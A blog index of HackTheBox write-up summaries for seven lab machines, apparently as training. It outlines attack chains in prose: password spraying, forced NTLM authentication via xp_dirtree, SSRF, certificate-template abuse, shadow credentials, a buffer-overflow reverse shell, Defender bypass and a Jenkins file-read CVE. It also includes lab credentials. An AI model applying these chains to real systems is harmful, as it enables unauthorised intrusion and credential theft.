Medium

Machine #48 on the Lain Kusanagi list. Active Directory, a forgotten config file, and the Azure AD Sync service doing what it really shouldn’t. Machine Info Field Details Name Monteverde Platform HackTheBox OS Windows Difficulty Medium IP 10.129.228.111 Domain MEGABANK.LOCAL TL;DR Null session via nxc gives a full user list. A password spray with username=password lands SABatchJobs:SABatchJobs. Listing SMB shares reveals users$ is readable - spider_plus finds mhope/azure.xml, a leftover Azure AD Connect config file with a cleartext password. Spray again, get mhope via WinRM. mhope is in the Azure Admins group and the ADSync service is running locally. A public PoC decrypts the ADSync credentials from the local MSSQL database, handing us domain administrator. ...

SQL injection doesn’t always mean dumping a database. Sometimes it just means coaxing the server into making a network connection it shouldn’t - and that’s enough to steal credentials. Giddy is a great example of that, paired with a creative privesc that requires bypassing Windows Defender with a custom payload. Machine Info Field Details Name Giddy Platform HackTheBox OS Windows Difficulty Medium IP 10.129.96.140 TL;DR ASP.NET MVC app has a search endpoint vulnerable to SQL injection. We use xp_dirtree to force the SQL Server to authenticate outbound to our Responder instance, capturing Stacy’s NTLMv2 hash. After cracking it, Evil-WinRM gives us a shell. On the machine we find a unifivideo folder hinting at CVE-2016-6914 - Ubiquiti UniFi Video’s service hijacks taskkill.exe on stop. Defender blocks msfvenom, so we cross-compile a custom Go payload to add a local admin user and RDP in as root. ...

Another medium box that starts with just a web form and ends with a root shell through a surprisingly elegant chain. Editorial is all about knowing what to look for — and what to ask the server to fetch for you. Machine Info Field Value Name Editorial Platform HackTheBox OS Linux Difficulty Medium IP 10.129.1.101 TL;DR SSRF on the book cover URL field → internal API on port 5000 → /api/latest/metadata/messages/authors leaks SSH creds for dev → git history in ~/apps reveals prod credentials → prod can run a GitPython clone script as root → ext:: protocol injection sets SUID on /bin/bash → root. ...

Machine Info Field Value Name Escape Platform HackTheBox OS Windows Difficulty Medium IP 10.129.228.253 TL;DR An unauthenticated SMB Public share exposes a PDF that contains SQL Server credentials. Connecting to MSSQL with those creds, we abuse xp_dirtree to capture the NTLMv2 hash of sql_svc via Responder and crack it with John. From there, SQL Server error logs left cleartext credentials for Ryan.Cooper lying around. As Ryan, certipy reveals an ESC1-vulnerable certificate template that allows anyone in Domain Users to request a cert on behalf of Administrator. One certificate later, we get the Administrator NT hash and land a SYSTEM shell via psexec. ...

Machine Information Field Details Name Certified Platform HackTheBox OS Windows Difficulty Medium You start this box with valid low-privilege domain credentials: judith.mader / judith09. The path to Administrator is a chain of ACL abuses through Active Directory — no CVE, no exotic exploit, just misplaced permissions and the right tooling. TL;DR judith.mader has WriteOwner on the Management group. That lets us take ownership, grant ourselves FullControl via DACL edit, and add judith to the group. Management has GenericWrite on management_svc, so we use pywhisker to inject shadow credentials and retrieve the NTLM hash via PKINITtools. With management_svc on the box we find GenericAll on ca_operator in BloodHound, reset its password, then exploit ESC9 with certipy to forge an Administrator certificate. Final step: psexec as SYSTEM. ...

Machine Information Field Details Name Chatterbox Platform HackTheBox OS Windows Difficulty Medium TL;DR AChat 0.150 beta7 is running on a non-standard port with a known buffer overflow. A public Python PoC gets us a shell as alfred after generating an x86 unicode-compatible reverse shell payload with msfvenom. Once in, the registry gives away autologon credentials (Alfred:Welcome1!) that also work for Administrator — straightforward credential reuse to SYSTEM. Recon 1 nmap -sC -sV -p- 10.129.1.92 Most of the ports are standard Windows noise — RPC, SMB. The interesting ones are 9255 and 9256, both identified as AChat. That’s a Windows chat application that barely anyone runs outside of CTFs, which is a big hint there’s something exploitable there. ...

Jenkins is one of those tools that organizations often spin up quickly and forget to harden. Builder is a medium-difficulty Linux box that demonstrates exactly what happens when that oversight meets a known CVE and a stored credential that wasn’t meant to be found. Machine Info Field Value Name Builder Platform HackTheBox OS Linux Difficulty Medium IP 10.129.230.220 TL;DR Jenkins 2.441 is vulnerable to a Local File Inclusion (CVE-2024-23897). The LFI lets us read arbitrary files from the server, which is enough to enumerate Jenkins users, steal a password hash, crack it, log in as that user, and execute a Groovy reverse shell from the Script Console. The shell lands inside a Docker container. From there, the Jenkins home directory contains an encrypted SSH private key in credentials.xml. We use pwn_jenkins to decrypt it with master.key and hudson.util.Secret, then SSH in as root. ...